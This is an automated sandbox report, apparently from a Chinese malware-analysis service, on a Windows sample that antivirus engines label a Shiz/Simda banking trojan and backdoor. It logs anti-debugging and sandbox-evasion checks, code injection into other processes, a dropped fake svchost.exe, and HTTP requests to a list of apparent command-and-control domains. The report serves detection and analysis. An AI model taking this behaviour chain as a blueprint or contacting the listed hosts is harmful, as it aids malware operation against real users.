SmartHawk

14.8

0-day

63 个模型检测该样本为恶意！

重新分析

下载样本

7b673f65dfb02aea2b7fe950c749c17a953d2b9514aa78c663aac6c002b6bf6b

8e06cec4b5faf0db8f785f458b7dbce5.exe

分析耗时

74s

最近分析

文件大小

355.5KB

静态报毒动态报毒 100% A + MAL AI SCORE=82 AIDETECTVM ATTRIBUTE AXSV BSCOPE CARBERP CLASSIC CONFIDENCE ELDORADO EMOGEN ESRGLB FDOB GENASA GENETIC HIGH CONFIDENCE HIGHCONFIDENCE HIJACKER IBANK KCLOUD KVMH017 MALICIOUS PE MALWARE1 SCORE SHIZ SIMDA SPYSHIZ STATIC AI SUSGEN TROJANPSW UNSAFE WQX@A40KSLO XDLQGVFONP0 ZEXAF ZUSY ZV@6LDVXF 更多

未检测暂无鹰眼引擎检测结果

查杀引擎	查杀结果	查杀时间	查杀版本
McAfee	BackDoor-FDOB!8E06CEC4B5FA	20201211	6.0.6.653
Alibaba	Backdoor:Win32/Simda.ef3da10d	20190527	0.3.0.5
Baidu	Win32.Trojan-Spy.Shiz.b	20190318	1.0.0.2
Avast	Win32:Shiz-JT [Trj]	20201210	21.1.5827.0
Tencent	Backdoor.Win32.Generic.a	20201211	1.0.0.1
Kingsoft	Win32.Heur.KVMH017.a.(kcloud)	20201211	2017.9.26.565
CrowdStrike	win/malicious_confidence_100% (W)	20190702	1.0

Queries for the computername (3 个事件)

Time & API	Arguments	Status	Return
1619691122.083625 GetComputerNameA	computer_name: OSKAR-PC	success	1
1619691122.631 GetComputerNameA	computer_name: OSKAR-PC	success	1
1619691122.646 GetComputerNameA	computer_name: OSKAR-PC	success	1

Checks if process is being debugged by a debugger (18 个事件)

Time & API	Arguments	Status	Return	Repeated
1619686131.278538 IsDebuggerPresent		failed	0	0
1619691121.505625 IsDebuggerPresent		failed	0	0
1619691123.333625 IsDebuggerPresent		failed	0	0
1619691123.442625 IsDebuggerPresent		failed	0	0
1619691123.473625 IsDebuggerPresent		failed	0	0
1619691123.520625 IsDebuggerPresent		failed	0	0
1619691123.551625 IsDebuggerPresent		failed	0	0
1619691123.583625 IsDebuggerPresent		failed	0	0
1619691123.661625 IsDebuggerPresent		failed	0	0
1619691123.801625 IsDebuggerPresent		failed	0	0
1619691123.833625 IsDebuggerPresent		failed	0	0
1619691123.895625 IsDebuggerPresent		failed	0	0
1619691123.911625 IsDebuggerPresent		failed	0	0
1619691123.911625 IsDebuggerPresent		failed	0	0
1619691124.098625 IsDebuggerPresent		failed	0	0
1619691124.130625 IsDebuggerPresent		failed	0	0
1619691124.145625 IsDebuggerPresent		failed	0	0
1619691125.067625 IsDebuggerPresent		failed	0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (19 个事件)

request	GET http://gahyqah.com/login.php
request	GET http://pumypog.com/login.php
request	GET http://puzywel.com/login.php
request	GET http://qeqysag.com/login.php
request	GET http://ganypih.com/login.php
request	GET http://lysyfyj.com/login.php
request	GET http://pupybul.com/login.php
request	GET http://galyqaz.com/login.php
request	GET http://volykyc.com/login.php
request	GET http://lyvyxor.com/login.php
request	GET http://pufygug.com/login.php
request	GET http://qetyfuv.com/login.php
request	GET http://qegyhig.com/login.php
request	GET http://puvytuq.com/login.php
request	GET http://pumyxiv.com/login.php
request	GET http://puzylyp.com/login.php
request	GET http://www.pupybul.com/login.php
request	GET http://melanthios-ana.com/zcvisitor/71fe99de-a890-11eb-a8ac-0adc16a03bef/72092e88-2c53-401c-b988-51ef43ce1034?campaignid=62a5ec10-a752-11eb-b4f9-0a918cbcbb97
request	GET http://www.gahyqah.com/login.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 79 个事件)

Time & API	Arguments	Status
1619691121.848625 NtAllocateVirtualMemory	process_identifier: 2368 region_size: 745472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02440000	success
1619691122.396 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 405504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x005a0000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02340000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x02340000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775e9000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x02340000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02390000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x02390000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x02390000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x02340000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775e9000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x023a0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023a0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023a0000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x023b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023b0000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x023c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x023b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x003b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003b0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x003c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003c0000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x003d0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003d0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003d0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003c0000	success
1619691122.631 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.631 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x003e0000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003e0000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x003e0000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.646 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x01f20000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x01f20000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x01f20000	success
1619691122.646 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x01f30000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x01f30000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x01f30000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x01f20000	success
1619691122.646 NtProtectVirtualMemory	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff base_address: 0x775a7000	success
1619691122.646 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x01f40000	success

Creates executable files on the filesystem (1 个事件)

file	C:\Windows\AppPatch\svchost.exe

Creates a suspicious process (1 个事件)

cmdline

C:\Windows\AppPatch\svchost.exe

Drops a binary and executes it (1 个事件)

file	C:\Windows\AppPatch\svchost.exe

Drops an executable to the user AppData folder (1 个事件)

file	C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5697.tmp

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (4 个事件)

Time & API	Arguments	Status	Return
1619686131.310538 Process32NextW	process_name: sdclt.exe snapshot_handle: 0x000000a4 process_identifier: 2080	success	1
1619686131.310538 Process32NextW	process_name: mobsync.exe snapshot_handle: 0x000000a4 process_identifier: 2308	success	1
1619691121.520625 Process32NextW	process_name: svchost.exe snapshot_handle: 0x000000a4 process_identifier: 2368	success	1
1619691121.520625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000000a4 process_identifier: 2616	success	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619691124.755625 GetAdaptersAddresses	flags: 0 family: 0	failed	111	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 71 个事件)

Time & API	Arguments	Status
1619686131.310538 Process32NextW	process_name: 8e06cec4b5faf0db8f785f458b7dbce5.exe snapshot_handle: 0x000000a4 process_identifier: 2288	failed
1619686131.325538 Process32NextW	process_name: 8e06cec4b5faf0db8f785f458b7dbce5.exe snapshot_handle: 0x000000a4 process_identifier: 2288	failed
1619686131.325538 Process32NextW	process_name: 8e06cec4b5faf0db8f785f458b7dbce5.exe snapshot_handle: 0x000000a4 process_identifier: 2288	failed
1619686131.341538 Process32NextW	process_name: 8e06cec4b5faf0db8f785f458b7dbce5.exe snapshot_handle: 0x000000a4 process_identifier: 2288	failed
1619691121.520625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000000a4 process_identifier: 2616	failed
1619691121.536625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000000a4 process_identifier: 2616	failed
1619691121.551625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000000a4 process_identifier: 2616	failed
1619691121.567625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000000a4 process_identifier: 2616	failed
1619691123.380625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000083c process_identifier: 2616	failed
1619691123.395625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000083c process_identifier: 2616	failed
1619691123.442625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000089c process_identifier: 2616	failed
1619691123.458625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000089c process_identifier: 2616	failed
1619691123.489625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000089c process_identifier: 2616	failed
1619691123.505625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x0000089c process_identifier: 2616	failed
1619691123.567625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008d8 process_identifier: 2616	failed
1619691123.598625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008f0 process_identifier: 2616	failed
1619691123.630625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008f0 process_identifier: 2616	failed
1619691123.630625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008f0 process_identifier: 2616	failed
1619691123.676625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000940 process_identifier: 2616	failed
1619691123.692625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000940 process_identifier: 2616	failed
1619691123.708625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000940 process_identifier: 2616	failed
1619691123.708625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000940 process_identifier: 2616	failed
1619691123.770625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008a4 process_identifier: 2616	failed
1619691123.801625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000900 process_identifier: 2616	failed
1619691123.833625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000978 process_identifier: 2616	failed
1619691123.848625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000978 process_identifier: 2616	failed
1619691123.864625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000978 process_identifier: 2616	failed
1619691123.880625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008a4 process_identifier: 2616	failed
1619691123.895625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000990 process_identifier: 2616	failed
1619691123.911625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000964 process_identifier: 2616	failed
1619691123.942625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000964 process_identifier: 2616	failed
1619691123.942625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000964 process_identifier: 2616	failed
1619691123.973625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000964 process_identifier: 2616	failed
1619691123.973625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000978 process_identifier: 2616	failed
1619691124.005625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000009ac process_identifier: 2616	failed
1619691124.051625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000009ac process_identifier: 2616	failed
1619691124.051625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008bc process_identifier: 2616	failed
1619691124.067625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008bc process_identifier: 2616	failed
1619691124.083625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008bc process_identifier: 2616	failed
1619691124.098625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000008bc process_identifier: 2616	failed
1619691124.114625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000009f0 process_identifier: 2616	failed
1619691124.130625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000670 process_identifier: 2616	failed
1619691124.145625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000670 process_identifier: 2616	failed
1619691124.145625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000670 process_identifier: 2616	failed
1619691124.145625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000878 process_identifier: 2616	failed
1619691124.176625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000990 process_identifier: 2616	failed
1619691124.176625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000990 process_identifier: 2616	failed
1619691124.192625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000684 process_identifier: 2616	failed
1619691124.208625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x00000684 process_identifier: 2616	failed
1619691124.208625 Process32NextW	process_name: inject-x86.exe snapshot_handle: 0x000009a8 process_identifier: 2616	failed

Created a process named as a common system process (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619686132.747538 CreateProcessInternalW	thread_identifier: 2764 thread_handle: 0x000000f4 process_identifier: 2368 current_directory: filepath: C:\Windows\AppPatch\svchost.exe track: 1 command_line: filepath_r: C:\Windows\apppatch\svchost.exe stack_pivoted: 0 creation_flags: 0 () process_handle: 0x000000e8 inherit_handles: 0	success	1	0

One or more of the buffers contains an embedded PE file (1 个事件)

buffer

Buffer with sha1: 501b45da2f14fb66a5098cfaa2e35fcd0070956c

Communicates with host for which no DNS query was performed (1 个事件)

host

172.217.24.14

Allocates execute permission to another process indicative of possible code injection (12 个事件)

Time & API	Arguments	Status
1619691121.817625 NtAllocateVirtualMemory	process_identifier: 2368 region_size: 688128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000000e8 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02290000	success
1619691122.114625 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00320000	success
1619691122.380625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x004a0000	success
1619691122.411625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00500000	success
1619691122.426625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02540000	success
1619691122.473625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x025a0000	success
1619691122.505625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f0 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02600000	success
1619691122.567625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02660000	success
1619691122.614625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x026c0000	success
1619691122.645625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02720000	success
1619691122.676625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02780000	success
1619691122.723625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x027e0000	success

Attempts to identify installed AV products by installation directory (1 个事件)

file	C:\Program Files (x86)\AVG\AVG9\dfncfg.dat

Checks for the presence of known windows from debuggers and forensic tools (18 个事件)

Time & API	Arguments	Status
1619686131.278538 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691121.505625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.333625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.442625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.473625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.520625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.551625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.583625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.661625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.801625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.833625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.895625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.911625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691123.911625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691124.098625 FindWindowA	class_name: OLLYDBG window_name:	failed
